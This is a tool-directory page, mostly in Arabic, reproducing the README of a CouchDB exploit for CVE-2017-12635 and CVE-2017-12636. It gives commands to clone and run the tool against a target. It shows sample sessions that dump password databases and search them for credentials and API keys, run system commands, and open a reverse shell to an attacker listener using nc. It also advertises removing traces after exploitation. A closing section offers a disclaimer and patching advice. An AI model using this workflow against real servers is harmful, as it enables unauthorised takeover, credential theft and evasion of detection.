Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
couchdb-exploit — يستغل ثغرات CouchDB (CVE-2017-12635/12636) لتصعيد الصلاحيات وتنفيذ الأوامر عن بُعد (RCE)، ثم يوفر شلًا تفاعليًا مع تنفيذ الأوامر وتصفح قاعدة البيانات وشل عكسي. | Kitploit
أدوات/GitHubGitHub/darabium/couchdb-exploit
تصعيد الامتيازاتالاستغلالجمع المعلوماتما بعد الاستغلالاختبار الاختراقالفريق الأحمرأداة الوصول عن بعد
GitHubdarabium/couchdb-exploit

couchdb-exploit

يستغل ثغرات CouchDB (CVE-2017-12635/12636) لتصعيد الصلاحيات وتنفيذ الأوامر عن بُعد (RCE)، ثم يوفر شلًا تفاعليًا مع تنفيذ الأوامر وتصفح قاعدة البيانات وشل عكسي.

عرض المستودع
منذ 18 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🚀 CouchDB Exploit - CVE-2017-12635 & CVE-2017-12636

Python License CVE CVE

Apache CouchDB - تصعيد الصلاحيات وتنفيذ الأكواد عن بُعد

GitHub stars GitHub forks


📖 نظرة عامة

تستغل هذه الأداة ثغرتين حرجتين في Apache CouchDB:

CVEالوصفالخطورة
CVE-2017-12635تصعيد الصلاحيات عبر تجاوز تحليل JSON🔴 حرجة
CVE-2017-12636تنفيذ الأكواد عن بُعد عبر Query Server🔴 حرجة

كيف تعمل الأداة

  1. CVE-2017-12635: تستغل عدم اتساق تحليل JSON بين محلّلي Erlang وJavaScript لإنشاء مستخدم بصلاحيات إدارية
  2. CVE-2017-12636: تستخدم صلاحيات المسؤول لتهيئة Query Server خبيث وتنفيذ أوامر النظام

🎯 الإصدارات المتأثرة

فحص سريع

curl http://target:5984/

If version is 1.x.x or 2.0.x/2.1.0 → VULNERABLE

✨ الميزات

root@kitploit:~
✅ استغلال تلقائي - أمر واحد للتحكم في كل شيء

✅ قشرة تفاعلية - واجهة أوامر سهلة الاستخدام

✅ عارض قواعد البيانات - تصفح جميع قواعد البيانات والمستندات

✅ عرض JSON كامل - رؤية محتوى المستند بالكامل

✅ بحث شامل - البحث عن الكلمات المفتاحية في جميع قواعد البيانات

✅ أوامر النظام - تنفيذ أوامر عشوائية على الجهاز الهدف

✅ قشرة عكسية - الحصول على قشرة تفاعلية كاملة

✅ سجل الأوامر - تتبع إجراءاتك

✅ تنظيف تلقائي - إزالة الآثار بعد الاستغلال

✅ إخراج ملوّن - سهل القراءة والفهم

📦 التثبيت

المتطلبات الأساسية

root@kitploit:~

# Python 3.6+ required
python3 --version

الاستنساخ والتثبيت

root@kitploit:~

# Clone the repository
git clone https://github.com/darabium/couchdb-exploit.git
cd couchdb-exploit

# Install dependencies
pip install -r requirements.txt

المتطلبات

root@kitploit:~

requests>=2.25.0
urllib3>=1.26.0

🚀 الاستخدام

الاستخدام الأساسي

root@kitploit:~

# Simple exploit
python3 couchdb-exploit.py -t <TARGET_IP> -p <PORT>

# Example
python3 couchdb-exploit.py -t 192.168.1.100 -p 5984

خيارات سطر الأوامر

root@kitploit:~

python3 couchdb-exploit.py -h

usage: couchdb-exploit.py [-h] -t TARGET [-p PORT]

arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Target IP address or hostname
  -p PORT, --port PORT  Target port (default: 5984)

💻 الأوامر

بعد نجاح الاستغلال، ستحصل على قشرة تفاعلية:

📊 أمثلة

1. عرض جميع قواعد البيانات

root@kitploit:~

couchdb> db

[+] 39 databases:
   1. _replicator (0 docs)
   2. _users (12 docs)
   3. admin (5 docs)
   4. passwords (25 docs)
   5. core-configuration (8 docs)
   ...

2. عرض محتوى قاعدة البيانات

root@kitploit:~

couchdb> view passwords

[+] Viewing database: passwords
============================================================
[*] Total documents: 25

📄 Document #1
ID: user_admin
Full content:
{
  "_id": "user_admin",
  "username": "admin",
  "password": "Admin123!",
  "email": "[email protected]",
  "role": "superadmin"
}
------------------------------------------------------------

3. البحث عن بيانات الاعتماد

root@kitploit:~

couchdb> search password

[+] Searching for 'password' in all databases...
============================================================

✅ Found in 'passwords'
ID: user1
Content:
{
  "username": "root",
  "password": "rootpass123"
}

✅ Found in 'config'
ID: app_settings
Content:
{
  "db_password": "secret123",
  "api_key": "sk_live_abc123"
}

4. تنفيذ أوامر النظام

root@kitploit:~

couchdb> exec whoami
[+] Executing: whoami
[+] Command executed!

couchdb> exec id
[+] Executing: id
[+] Command executed!

5. القشرة العكسية

root@kitploit:~

# On your machine (listener)
nc -lvnp 4444

# In the exploit
couchdb> reverse 10.0.0.1 4444
[+] Setting up reverse shell to 10.0.0.1:4444
[!] Make sure listener is running: nc -lvnp 4444
[?] Continue? (y/n): y
[+] Reverse shell triggered!

# You should get a shell on your listener!

🖼️ لقطات الشاشة

الاستغلال أثناء العمل

https://via.placeholder.com/800x400?text=Exploit+Demo+Screenshot

عرض قاعدة البيانات

https://via.placeholder.com/800x400?text=Database+View

القشرة العكسية

https://via.placeholder.com/800x400?text=Reverse+Shell

⚠️ إخلاء المسؤولية

root@kitploit:~
هام: هذه الأداة مخصصة للأغراض التعليمية وللاختبارات المصرّح بها فقط.

    🚫 لا تستخدمها على أنظمة دون إذن صريح

    🚫 المؤلف غير مسؤول عن أي سوء استخدام

    🚫 استخدمها فقط في بيئات خاضعة للتحكم أو على أنظمتك الخاصة

    ✅ احصل دائمًا على تصريح كتابي قبل الاختبار

    ✅ اتبع ممارسات الإفصاح المسؤول

باستخدامك لهذه الأداة، فإنك توافق على هذه الشروط.

🔐 نصائح أمنية

إذا كنت مسؤول نظام:

root@kitploit:~
قم بالترقية فورًا إلى CouchDB ≥ 1.7.0 أو ≥ 2.1.1

استخدم جدار الحماية لتقييد الوصول إلى المنفذ 5984

فعّل المصادقة واستخدم كلمات مرور قوية

راقب السجلات بحثًا عن أي نشاط مشبوه

قم بمراجعات أمنية منتظمة لبنيتك التحتية

إصلاح سريع

root@kitploit:~

# Upgrade CouchDB
sudo apt-get update
sudo apt-get install couchdb=2.1.1  # Or latest version

# Restrict access
sudo ufw allow from 192.168.1.0/24 to any port 5984

📚 المراجع

root@kitploit:~
CVE-2017-12635 - NVD

CVE-2017-12636 - NVD

أمان Apache CouchDB

Exploit-DB

👤 المؤلف

darabium

root@kitploit:~
GitHub: @darabium

Telegram: @darabium

⭐ الدعم

إذا وجدت هذه الأداة مفيدة:

root@kitploit:~
⭐ قم بتمييز المستودع بنجمة

🐛 أبلغ عن المشكلات

🔧 ساهم بالتحسينات

📢 شاركها مع الآخرين

📄 الترخيص

هذا المشروع مرخّص بموجب رخصة MIT - راجع ملف LICENSE للحصول على التفاصيل.

صُنع بـ ❤️ لأبحاث الأمن

⬆ العودة إلى الأعلى

تنزيل الأداة
الإصدارقابل للاستغلالالإصدار المُصحَّح
Apache CouchDB < 1.7.0✅ نعم1.7.0
Apache CouchDB 1.x.x✅ نعم1.7.0
Apache CouchDB 2.0.0✅ نعم2.1.1
Apache CouchDB 2.1.0✅ نعم2.1.1
Apache CouchDB ≥ 2.1.1❌ لا-
الأمرالوصفالمثال
dbعرض جميع قواعد البيانات مع عدد المستنداتdb
view عرض جميع المستندات في قاعدة بيانات (JSON كامل)view passwords
raw عرض استجابة الخادم الخامraw admin
count حساب عدد المستندات في قاعدة بياناتcount users
search البحث عن كلمة مفتاحية في جميع قواعد البياناتsearch admin
exec تنفيذ أمر نظامexec whoami
reverse إعداد قشرة عكسيةreverse 10.0.0.1 4444
historyعرض سجل الأوامرhistory
helpعرض هذه القائمةhelp
exitالخروج مع التنظيفexit